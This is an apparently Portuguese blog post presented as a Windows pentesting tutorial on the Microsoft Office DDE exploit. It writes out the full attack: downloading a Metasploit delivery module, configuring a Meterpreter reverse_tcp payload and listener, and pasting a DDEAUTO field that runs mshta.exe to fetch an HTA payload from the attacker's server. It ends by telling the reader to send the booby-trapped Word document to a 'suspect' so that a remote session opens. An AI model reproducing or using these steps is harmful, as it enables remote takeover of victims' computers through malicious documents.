NOTÍCIAS

[ANONYMOUS][grids]

Pentesting Windows usando o Microsoft Office DDE Exploit



Pentesting Windows usando o Microsoft Office DDE Exploit

O DDE exploit também era conhecido como troca dinâmica de dados, permite que os dados sejam transferidos entre aplicativos sem qualquer interação do usuário. Os hackers utilizaram esse método para executar scripts mal-intencionados para comprometê-lo.
Foi relatado à Microsoft pelo Sensepost, Etienne Stalmans e Saif El-Sherei, mas não foi corrigido porque muitos aplicativos estão usando o protocolo DDE. Esta exploração não requer uma função de macro para ser ativada.

Pré-requisitos - DDE exploit

  • 📌Máquina Windows
  • 📌Microsoft Office (qualquer versão)
  • 📌KALI LINUX
Teremos que importar uma exploração do Metasploit.
Faça o download do GitHub usando o terminal de comando

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Mova o script para o local do Metasploit

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
 

Agora digite msfconsole no terminal, que inicia o framework Metasploit e digite reload_all para carregar os módulos.


Esse exploit usa a função dde para entregar a carga hta. Agora digite

use exploit/windows/dde_delivery 
then set the sever host using the following command

set SRVHOST 192.168.177.141
precisamos definir um ouvinte de carga. Não use a porta 8080, pois a porta do servidor está definida por padrão para 8080

  1. set PAYLOAD windows/meterpreter/reverse_tcp
  2. set LHOST 192.168.177.141
  3. set LPORT 6708
  4. exploit


Agora copie e cole o código em qualquer documento do word. usamos o office 365 pro plus, totalmente atualizado. Localize a fórmula e você deve ter uma pequena caixa de erro no documento e, em seguida, clique com o botão direito do mouse no código de alternância. cole o comando no documento entre parênteses de flor. salve o documento.

{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}
 
Envie o documento para o suspeito e uma sessão de medidor será aberta. Dê uma olhada no vídeo




Pentesting Windows usando o Microsoft Office DDE Exploit